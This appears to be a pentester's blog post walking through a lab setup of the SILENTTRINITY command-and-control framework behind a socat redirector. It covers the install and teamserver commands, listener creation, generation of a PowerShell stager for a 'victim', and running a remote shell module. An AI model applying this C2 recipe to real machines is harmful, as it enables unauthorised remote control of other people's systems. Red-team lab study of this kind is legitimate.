Fith step in setting up C2 environment. Using socat as front to SILENTTRINITY. Command and Control my way. @c2_matrix @byt3bl33d3r @porchetta_ind #pentest #pentesting #redteam #infosec

Now we are gonna look at SILENTTRINITY from @byt3bl33d3r I think this will be the last test of Command and Controll application. I have other stuff to do. But I hope you all had a good read and set some things in motions for you.

Here is the link that you can read and download the SILENTTRINTY https://github.com/byt3bl33d3r/SILENTTRINITY

A picture says more than 1000 words so lets start with that!

SILENTTRINITY

The steps!

  1. run socat for the external access from victim to C2
  2. Install kali
  3. Install SILENTTRINITY
  4. Create listeners
  5. Create payloads
  6. Run payloads
  7. Take over the machine

Socat

Go back a few blogpost to get more information about socat.

sudo socat TCP4-LISTEN:80,fork,reuseaddr TCP:172.21.21.41:80

Server

Lets jump in the installation of SILENTTRINITY.

Git Clone the stuff

git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git

install

Time so do som pip3. I also tried to install this on clean ubuntu 20.10, but did get some error about Pyhton crypto stuf cffi modules and so one. This worked directly on a Kali box. I did fix that with below command:

sudo apt-get install build-essential libssl-dev libffi-dev python-dev

Time to install.

pip3 install --user pipenv && pipenv install && pipenv shell
Install 2

Run the server

pipenv shell

python3.9 st.py teamserver 172.21.21.40 password

server

Client

Client
client 2

Time to connect to the teamserver from the client

teamservers
connect wss://roger:password@172.21.21.40:5000

Client Connect

Type list to see the connecttion

list

Time to create a listener for our victim to connect to. Type list under listeners to see what listeners you have.

listeners
list -a

listerners

This time we use the http one with below command
use http
options

options listeners

Create payload or stager that is called here

stager
list

stager

Generate the stager for the listener http

use use powershell_stageless
generate http

stager

Victim

Now take this stager.ps1 and put this on the victim in some way. Use your own imagination how to do that. www, ftp, floppy, cd or irc…

Run it on the client

Go back to the SILENTTRINTY client to interact with the victim

See active sessions and list them. The name here is important, we use that name when we run our modules.

sessions
list

sessions

How to use a module to a connected victim

modules
list

modules

Use the module and run it.

use boo/shell
options
set Command whoami

run

So this was the last C2 in this round. I hope in the future I will have time to test som more C2 stuff.

Keep hacking!

//Roger

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.